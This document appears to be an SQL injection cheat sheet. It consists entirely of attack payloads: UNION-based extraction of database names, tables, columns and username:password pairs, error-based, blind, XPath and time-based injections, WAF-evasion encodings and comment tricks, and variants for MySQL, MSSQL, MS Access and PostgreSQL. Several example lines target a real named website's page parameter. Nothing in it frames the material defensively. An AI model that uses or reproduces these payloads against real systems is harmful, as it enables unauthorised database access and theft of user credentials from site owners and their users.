LOAD_FILE()

order by 10-- -
UNION SELECT 1,2,3,4,5-- -
UNION SELECT 1,user(),3,database(),version(),6-- -
UNION SELECT 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=0x74626c5f75736572--  -
UNION SELECT 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=(0x74626c5f75736572)--  -
UNION SELECT 1,2,group_concat(uid,0x3a,pwd),4,5 from tbl_user-- -

(select(@x)from(select(@x:=0x00)(select(null)from(information_schema.columns,information_schema.tables)where(columns.table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(tables.TABLE_ROWS>0)and(0x00)in(@x:=concat(@x,0x3c62723e,columns.table_schema,0x2e,columns.table_name,0x3a,columns.column_name))))x)

___________________
/*!  SELECT */		like		+
UNIunionON SEselectLECT
CONCAT_WS(CHAR(32,58,32),user(),database(),version())
unhex(hex())
convert(group_concat(table_name)+using+ascii)
convert(version() using latin1)
aes_decrypt(aes_encrypt(version(),1),1)
unhex(hex(@@version))
cast(version()+as+binary)
convert(version(),binary)
convert(version()+using+binary)
CHAR(117, 115, 101, 114, 115)
UNION all /*!50000SELECT*/
information_schema.tables  ---> information_schema. tables
and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,1​​7,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36-+
Double Encoding
+uni*on+sel*ect+1,2,3--+
+(UnIoN)+(SelECT)+
+(UnIoN+SeLeCT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’ <-MySQL only
+'UnI'||'on'+SeLeCT' <-MSSQL only
/*!00000from*/
%46%72%6f%6d
%23xxx...xxx%0afrom
--+%0afrom
/*!50000FrOm*/
/*!00..from*/
Union select Null,Null,Null,Null,version(),Null-- -


--'- : +--+ / : -- - : --+- : /*) order by 1-- -') 
order by 1-- -')
order by 1%23%23%')
order by 1%23%23Null' 
order by 100--+Null' 
order by 9999--+')
group by 99-- -'
group by 119449-- -'
group/**/by/**/99%23%23
+union+distinct+select+
+union+distinctROW+select+/**/
/*!12345UNION SELECT*//**//*
*//*!50000UNION SELECT*//*
/*!50000UnIoN*/ /*!50000SeLeCt aLl*/
/*!u%6eion*/+/*!se%6cect*/
*/uniUNIONon/**/aALLll/**/selSELECTect/**/1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
/*!50000%55nIoN*/+/*!50000%53eLeCt*/
union /*!50000%53elect*/
%55nion %53elect
+Union+--+Select+
UnIoN/*&a=*/SeLeCT/*
’UnI”On’+'SeL”ECT’
'UnI'||'on'+SeLeCT'
uNiOn aLl sElEcTuUNIONnion all sSELECTelect 
//Buffer Overflow
+And(select 1)=(select 0×414)+union+select+1–
+And(select 1)=(select 0xAAAA)+union+select+1–
+And(select
1)=(select
0×4141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141414141414141414141414141414141414141414141414141414141414​
14141414141414141414141414141414141414141414141414141414141414141414141414141414​
14141414141414141414141414141414141414141414141414141414141414141414141414141414​
14141414141414141414141414141414141414141414141414141414141414141414141414141414​
14141414141414141414141414141414141414141414141414141414141414141414141414141414​
14141414141414141414141414141414141414141414141414141414141414141414141414141414​
14141414141414141414141414141414141414141414141414141414141414141414141414141414​
14141414141414141414141414141414141414141414141414141414141414141414141414141414​
1414141)+
+and (/*!select*/ 1)=(/*!select*/ 0xAA)+
========================
400
========================
–+%0A
union+select+1–+%0A,2–+%0A,3–+%0A,4–+%0A,5–+%0A –
========================
null the parameter
========================
id=-1
id=null
id=1+and+false+
id=9999
id=1 and 0
id==1
id=(-1)
========================
Group_Concat
========================
group_concat()
/*!group_concat*/()
grOUp_ConCat(/*!*/,0x3e,/*!*/)
group_concat(,0x3c62723e)
g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29
CoNcAt()
CONCAT(DISTINCT Version())
concat(,0x3a,)
concat%00()
%00CoNcAt()
/*!50000cOnCat*/(/*!Version()*/)
/*!50000cOnCat*/
/**//*!12345cOnCat*/(,0x3a,)
concat_ws()
concat(0x3a,,0x3c62723e)
/*!concat_ws(0x3a,)*/
concat_ws(0x3a3a3a,version()
CONCAT_WS(CHAR(32,58,32),version(),)
REVERSE(tacnoc)
binary(version())
uncompress(compress(version()))
aes_decrypt(aes_encrypt(version(),1),1)
========================
Avoid source page injection
========================
concat(?”>,
,@@version,?
“>
?
injection
concat(0x223e,@@version)
concat(0x273e27,version(),0x3c212d2d)
concat(0x223e3c62723e,version(),0x3c696d67207372633d22)
concat(0x223e,@@version,0x3c696d67207372633d22)
concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62​723e)
concat(0x223e3c62723e,@@version,0x3a,”BlackRose”,0x3c696d67207372633d22)
concat(‘’,@@version,’’)
concat(0x273c2f7469746c653e27,@@version,0x273c7469746c653e27)
concat(0x273c2f7469746c653e27,version(),0x273c7469746c653e27)
========================
Dump
========================
(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.columns)where​(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0×00)in(@x:=concat(@x,​0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)
like
http://www.marinaplast.com/page.php?id=-13
union select
1,2,(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.colu
mns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0×00)in(@x:=c​
oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5
========================
DB_NAME()
========================
@@database
database()
id=vv()
# like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,DB_NAME(),4,5 –
http://www.marinaplast.com/page.php?id=vv()
@@user
user()
user_name()
system_user()
# like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,user(),4,5 –
HOST_NAME()
@@hostname
@@servername
SERVERPROPERTY()
# like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,HOST_NAME(),4,5 –
@@datadir
datadir()
# like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,datadir(),4,5 –
ASPX
and 1=0/@@version
‘ and 1=0/@@version;–
‘) and 1=@@version–
and 1=0/user;–
========================
Error based
========================
//DB
or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1–
//Table
and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
//Column
and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
//Data
and (select 1 from (select count(*),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)




===[MSSQL]===
and 1=2#
and 1=convert(int,db_name())
and 1=convert(int,@@version)
and 1=convert(int,system_user)
and 1=convert(int,host_name())
and 1=convert(int,@@servername)
and 1=convert(int,(select top 1 cast(count([name]) as nvarchar(4000)) from [master]..[sysdatabases] )%2bchar(33))

and 1=convert(int,(select cast(name as nvarchar(4000)) from master..sysdatabases where dbid=1))
and 1=convert(int,(select top 1 cast(count(*) as nvarchar(4000)) from information_schema.tables )%2bchar(33))
and 1= convert(int,(select distinct top 1 table_name from (select distinct top 1 table_name from information_schema.tables order BY table_name ) sq order BY table_name DESC)%2bchar(33))
and 1=convert(int,(select distinct top 1 column_name from (select distinct top 1 column_name from information_schema.columns where table_name=char(83)%2bchar(117)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(114)%2bchar(105)%2bchar(98)%2bchar(101)%2bchar(114)%2bchar(115) order BY column_name ASC) sq order BY column_name DESC)%2bchar(33))
and 1=convert(int,(select top 1 email from Subscribers))


===[MSaccess]===
and 1=2#
and 0=(select count(*) from d:\.a)
order by 6#
and 1=2 union all select 1,2,3,4,5,6,7,8 from admin#
union all select 1,id,username,password,5,6,7,8 from admin#

.::[AllMyVisitor]::.
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/

.::[Blind SQLi]::.
AND 1=1
AND USER_NAME()='blind'
AND SUBSTRING(query,pos,length)
AND ascii(sUbstring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))=100

.::[Quick Blind]::.
And (Select 1 From(Select Count(*),Concat(CHAR (124),(Select Concat(version(),0x7c,database(),0x7c,user())),floor(rAnd(0)*2),CHAR  (124))x From Information_Schema.Tables Group By x)a)
And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select  substr(Group_concat(table_name),1,145) FROM information_schema.tables  where table_schema=database()),floor(rAnd(0)*2), CHAR (124))x FROM  Information_Schema.Tables Group By x)a)
And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select  substr(Group_concat(table_name),63,145) FROM information_schema.tables  where table_schema=database()),floor(rAnd(0)*2), CHAR (124))x FROM  Information_Schema.Tables Group By x)a)
And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select  substr(Group_concat(column_name),1,145) FROM information_schema.columns  where table_schema=database() and table_name=0xhex)  ,floor(rAnd(0)*2), CHAR (124))x FROM Information_Schema.Tables Group By  x)a)
And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select  substr(Group_concat(column_name_1,0x7c,column_name_2),1,145) FROM  table_name) ,floor(rAnd(0)*2), CHAR (124))x FROM  Information_Schema.Tables Group By x)a)

.::[X-Path]::.
and updatexml(0,concat(0x7c,version(),0x7c,database(), 0x7c,user()),0)-- -
and updatexml(0,concat(0x7c,(select concat(0x7c,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)),0)-- -
and updatexml(0,concat(0x7c,(select concat(0x7c,column_name) from information_schema.columns WHERE table_name=0x61646d696e limit 0,1)),0)-- -
and updatexml(0,concat(0x7c,(select concat(email,0x7c,password) from admin limit 0,1)),0)-- -

.::[Cookie-based]::.
1'		%0b

.::[Error-based]::.
or 1 group by concat_ws(0x7e7e,version(),user(),database(),floor(rand(0)*2)) having min(0) or 1-- -
or 1 group by concat_ws(0x7e7e,(select count|concat(schema_name) from information_schema.schemata limit 0,1),floor(rand(0)*2)) having min(0) or 1-- -
or 1 group by concat_ws(0x7e7e,(select count|concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)) having min(0) or 1-- -
or 1 group by concat_ws(0x7e7e,(select count|concat(column_name) from information_schema.columns where table_name=’admin’ limit 0,1),floor(rand(0)*2)) having min(0) or 1-- -
____
or 1 group by concat_ws(0x7e7e,(select count(*) from admin limit 0,1),floor(rand(0)*2)) having min(0) or 1-- -
or 1 group by concat_ws(0x7e7e,(select concat_ws(0x7e,username,pass) from admin limit 0,1),floor(rand(0)*2)) having min(0) or 1-- -
or 1 group by concat_ws(0x7e7e,(select concat(substring((concat_ws(0x7e,username,pass)),1,50),0x7e) from admin limit 0,1),floor(rand(0)*2)) having min(0) or 1–

.::[postgreSQL]::.
and 1=cast(version() as int)--
and 1=cast((select table_name from information_schema.tables limit 1 offset 0) as int)--
and 1=cast((select column_name from information_schema.columns where table_name= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101) limit 1 offset 0) as int)--
and 1=cast((select typname from pg_type limit 1 offset 0) as int)--